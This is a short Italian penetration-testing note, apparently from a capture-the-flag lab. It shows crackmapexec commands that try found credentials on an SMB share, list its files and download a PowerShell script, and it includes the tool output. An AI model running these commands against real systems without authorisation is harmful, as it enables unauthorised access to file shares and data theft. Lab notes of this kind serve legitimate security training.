tags: SMB SMB_Spidering Spidering


Quando si trovano delle credenziali e la vittima utilizza il servizio SMB è buona pratica provare quelle credenziali su ogni share presente, lo possiamo fare nel seguente modo:

crackmapexec smb 10.129.234.181 -u "john" -p 'SuperSecurePass123' --spider Devs --pattern .

In questo caso abbiamo provato le credenziali sullo share Devs.

crackmapexec smb 10.129.234.181 -u "john" -p 'SuperSecurePass123' --spider Devs --pattern .
SMB         10.129.234.181  445    WIN01            [*] Windows Server 2019 Standard 17763 x64 (name:WIN01) (domain:WIN01) (signing:False) (SMBv1:True)
SMB         10.129.234.181  445    WIN01            [+] WIN01\john:SuperSecurePass123 
SMB         10.129.234.181  445    WIN01            [*] Started spidering
SMB         10.129.234.181  445    WIN01            [*] Spidering .
SMB         10.129.234.181  445    WIN01            //10.129.234.181/Devs/. [dir]
SMB         10.129.234.181  445    WIN01            //10.129.234.181/Devs/.. [dir]
SMB         10.129.234.181  445    WIN01            //10.129.234.181/Devs/tmp.ps1 [lastm:'2025-02-23 22:32' size:1145]
SMB         10.129.234.181  445    WIN01            [*] Done spidering (Completed in 0.29802894592285156)

E abbiamo trovato il file tmp.ps1.

Per scaricarlo possiamo utilizzare il seguente comando:

crackmapexec smb 10.129.234.181 -u "john" -p 'SuperSecurePass123' --share Devs --get-file tmp.ps1 tmp.ps1
 
 
SMB         10.129.234.181  445    WIN01            [*] Windows Server 2019 Standard 17763 x64 (name:WIN01) (domain:WIN01) (signing:False) (SMBv1:True)
SMB         10.129.234.181  445    WIN01            [+] WIN01\john:SuperSecurePass123 
SMB         10.129.234.181  445    WIN01            [*] Copy tmp.ps1 to tmp.ps1
SMB         10.129.234.181  445    WIN01            [+] File tmp.ps1 was transferred to tmp.ps1